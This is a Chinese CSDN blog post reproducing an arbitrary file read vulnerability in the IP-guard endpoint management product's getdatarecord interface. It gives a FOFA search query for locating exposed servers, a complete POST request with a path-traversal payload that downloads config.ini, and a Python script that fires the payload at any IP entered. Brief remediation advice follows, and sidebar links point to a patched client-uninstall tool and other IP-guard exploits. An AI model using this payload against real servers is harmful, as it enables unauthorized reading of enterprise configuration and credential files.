IP-guard getdatarecord 存在任意文件读取

最新推荐文章于 2024-07-09 17:35:51 发布
最新推荐文章于 2024-07-09 17:35:51 发布
阅读量1k 收藏 11
点赞数
文章标签: 网络安全 安全 python 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56698744/article/details/138011361
版权
本文详细描述了IP-guard中存在的任意文件读取漏洞,攻击者可通过getdatarecord功能获取敏感数据。提供了漏洞复现方法和Python检测脚本,强调了及时报告、更新修补、访问控制等修复建议。
摘要由CSDN通过智能技术生成

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、产品介绍

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。

二、漏洞描述

IP-guard 是一款常用于企业内部的数字版权管理和数据泄露防护系统。如果 IP-guard 的 getdatarecord 功能或接口存在任意文件读取漏洞,那么这将是一个严重的安全问题。攻击者可能会利用这个漏洞来读取系统中的敏感文件,包括但不限于配置文件、源代码、数据库连接信息等,从而进一步威胁到企业的信息安全。

三、fofa语法

app="IP-guard"

四、漏洞复现

数据包

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 
Content-Length: 64
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

 

五、python检测脚本

import requests

def verify(ip):

    url = f'{ip}/ipg/appr/MApplyList/downloadFile_client/getdatarecord'

    header = {
        'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'close',
        'Content-Length': '64',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    payload = "path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A"

    try:
        response = requests.post(url, headers=header, data=payload)
        # 验证成功输出相关信息
        if response.status_code == 200 and '[webconfig]' in response.text:
            print('IP-guard getdatarecord 存在任意文件下载漏洞,请尽快修复漏洞!!!')

    except Exception as e:
        pass

if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)

六、修复建议

  1. 立即报告漏洞:如果你发现了 IP-guard 的 getdatarecord 功能存在任意文件读取漏洞,请立即报告给 IP-guard 的官方支持团队或相关的安全机构。他们将会对漏洞进行评估并发布相应的安全更新。

  2. 更新和修补:检查并安装 IP-guard 的最新更新和补丁。确保你的系统已经应用了所有官方发布的安全修复。

  3. 访问控制:加强对 IP-guard 的访问控制,限制能够执行 getdatarecord 操作的用户或系统账户。确保只有经过授权的用户才能访问敏感数据。

  4. 最小权限原则:遵循最小权限原则,为不同的用户或系统账户分配最小的必要权限。避免使用具有过高权限的账户来执行日常任务。

  5. 输入验证和过滤:对 getdatarecord 功能的输入进行严格的验证和过滤,确保只有预期的、安全的请求能够被处理。

  6. 安全审计和监控:定期进行安全审计和监控,检查系统中是否存在异常行为或未经授权的访问。及时发现并应对潜在的安全威胁。

故事讲予风听
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
IP-guard卸载工具
04-12
IP-guard上网行为管理,可以用这个工具卸载; 内容仅供学习交流,任何人不得将其用于非法用途,否则后果自行承担! * 运行`patched/Agt3Tool.exe`,选择卸载客户端->生成操作码->输入任意确认码->确定 * 运行`patched...
IP-Guard 基础安装配置教程
xjlaq的博客
03-11 7635
IP-Guard 基础安装配置教程
ip-guard产品功能介绍
weixin_45844403的博客
02-26 6210
1.1 前言 日新月异的信息科技,既给企业的发展带来了前所未有的便利,也给企业的信息维护及管理带来了风险和挑战: 信息数据安全如何保障 由普华永道与CIO、CSO举办,130个国家和地区、7200多名管理人员参与的全球信息安全调查显示,企业信息安全要“对症下药”,首先必须考虑数据的安全防护。56%的受访者表示自己的企业缺乏数据丢失防护能力。而接近半数的中国受访者表示,数据丢失保护的同时,没有实行数...
【转载】IP-guard 1day漏洞复现
最新发布
07-09 54
IP-guard研发厂商溢信科技,创立于2001年,是国内比较早从事内网安全产品开发的企业,始终致力于对企业内网安全问题的研究和解决。十九年服务于内网安全领域,积累了丰富的经验,为数万家企业量身打造了内网安全解决方案。原文链接:https://blog.csdn.net/weixin_47124866/article/details/134564780。版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。访问test1.php页面,可以见写入命令。
IP-guard远程办公安全解决方案,守护远程办公信息安全
IP-Guard专栏
03-18 1466
疫情在多地反弹,部分疫情严重的地方不得不将工作转为线上远程办公。然而企业在采取远程办公模式时,大量未知设备远程接入企业内网,各项终端的操作应用也往往不在企业的管控范围内,很容易成为企业信息保护的缺口,威胁企业的机密安全。 远程办公安全风险: 1、不安全的终端设备接入企业网络 2、机密文档随意下载到私人电脑 3、打印机密文档导致信息泄露 4、截屏或录屏导致文档内容泄露 5、随意传输机密文档而无法追溯 6、随意访问核心服务器导致信息泄露 针对远程办公所面临的各类信息安全问题,IP-guard
IP-guard屏幕监控,违规操作全记录
IP-Guard专栏
05-06 2676
审计终端操作,溯源泄密行为,我们需要详尽记录终端的各项行为,以便管理员能够及时发现风险以及异常操作,然而仅仅通过文字记录已经不能满足企业的审计需求,一些企业在进行严格的日志审计时,常常会结合屏幕记录一起使用。 屏幕监控工具很多,如果只是单纯记录所有终端的操作行为,不仅会占用大量的存储空间,也难以从海量的屏幕记录中发现违规泄密行为。针对企业当前对屏幕监控的多样化需求,IP-guard屏幕监控可以提供更有针对性的屏幕记录方案,帮助企业更加直观、有效的对终端行为进行审计。 IP-guard屏幕监控,掌握终端操
IP-guard Webserver view 远程命令执行漏洞【2023最新漏洞
holyxp的博客
11-12 2639
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)
0xSec
04-18 1604
2024年4月,互联网上披露IP-guardWebServer权限绕过漏洞情报,攻击者可利用该漏洞读取配置文件,获取数据库权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞
IP-Guard正版安装程序V4.54.0813
12-23
IP-guard企业信息监管系统,是一款领先的内网安全软件,它能够协助企业解决最棘手的内网安全问题,借助IP-guard强大的功能,企业能够有效地进行用户行为管理,防范信息外泄,文档透明加密,敏感内容识别管理系统DLP...
IP-guard 双机热备使用说明
10-10
双机热备使用说明 一、简介 服务器双机热备功能把主从服务器、数据库分别部署到 3 台机器上,实现主-从服务器 共享一个数据库,并且保持三者之间的通讯。当主服务器出现故障时,从服务器能及时响应 ...
IP-GUARD客户端打包程序
12-17
1. AInstGen.exe:这是IP-GUARD客户端打包程序的主执行文件,用于生成定制的客户端安装包。管理员通过运行这个程序,输入相应的参数和配置,就可以生成适合企业环境的安装文件。 2. AInstGen.pdb:这是一个程序...
IP-Guard初级工程师认证培训资料
01-08
IP-guard企业信息监管系统,是一款领先的内网安全软件,它能够协助企业解决最棘手的内网安全问题,借助IP-guard强大的功能,企业能够有效地进行用户行为管理,防范信息外泄,文档透明加密,敏感内容识别管理系统DLP...
IP-guard功能详解——设备管控
hupu521的博客
05-04 1180
IP-Guard设备管控功能可以实现以下功能: 设备控制 IP-guard可以对以下设备进行使用权限控制: 存储设备:U盘、移动硬盘、软驱、光驱、磁带机、移动存储设备等; 通讯设备:串/并口、SCSI、1394、蓝牙、红外线、MODEM、直接对联线等; USB设备:USB 键盘、鼠标、MODEM、映像设备、存储、光驱、硬盘和其他USB设备; 网络设备:无线网卡、即插即用网卡、虚拟网卡等; 其他设备:声音设备、虚拟光驱等;            移动智能终端 • IP-guard可以...
IP-GUARD试用版下载地址
IP-Guard专栏
01-08 1503
IP-GUARD试用版本安装程序下载链接地址:http://www.tec-development.com/down/IPguard/IPguard4_Trial.zip 下载安装后需要测试CDKEY:请打ip-guard官方电话咨询注册事项:4006661438
IP-guard WebServer 任意文件读取漏洞复现
0xSec
04-04 803
由于IP-guard WebServer/ipg/static/appr/lib/flexpaper/php/view.php接口处未对用户输入的数据进行严格的校验和过滤。未经身份验证的攻击者可随意操纵doc参数读取系统内部配置文件造成信息泄露,使系统处于极不安全的状态。
IP-guard WebServer 2024年两个漏洞简单分析
A345545108的博客
05-01 2409
这个漏洞看完索然无味,但是手上又刚好有源码,不看他一下又觉得可惜。
漏洞复现--IP-guard flexpaper RCE
qq_53003652的博客
11-13 680
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。该产品存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令直接获取服务器权限。ping后加上dnslog验证。
IP-guard WebServer RCE漏洞复现
0xSec
11-09 2881
IP-guard WebServer存在远程命令执行漏洞情报。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。
IP-Guard Webserver 远程命令执行漏洞(含批量验证poc)
2401_84418977的博客
04-17 462
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
ip-guard教程
11-26
IP-Guard 是一种网络安全软件,它可以帮助管理者监控和保护公司内部网络,防止未经授权的访问和数据泄露。下面是一个简单的 IP-Guard 教程,帮助你更好地了解这个软件的使用方法。 首先,你需要下载并安装 IP-Guard 软件。安装完成后,你需要设置管理员账号和密码,以便后续登录和管理软件。 接下来,你需要配置 IP-Guard 软件。可以设置访问控制规则,例如允许哪些 IP 地址访问公司的内部网络,禁止哪些 IP 地址访问等。另外,你还可以设置数据泄露防护规则,防止内部员工将公司的敏感数据传输到外部网络,确保公司数据的安全。 然后,你需要监控和审计公司的网络活动。IP-Guard 可以记录所有的网络访问记录,包括谁访问了哪些网站,下载了哪些文件等。通过对这些访问记录进行分析,你可以及时发现并阻止潜在的网络安全风险,保障公司网络的安全。 最后,你需要定期维护和更新 IP-Guard 软件。网络安全威胁时刻在变化,保持软件的更新和升级可以帮助你更好地应对各种新的网络安全威胁,确保公司网络的安全稳定运行。 以上就是一个简单的 IP-Guard 教程,希望能帮助你更好地了解和使用这款网络安全软件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值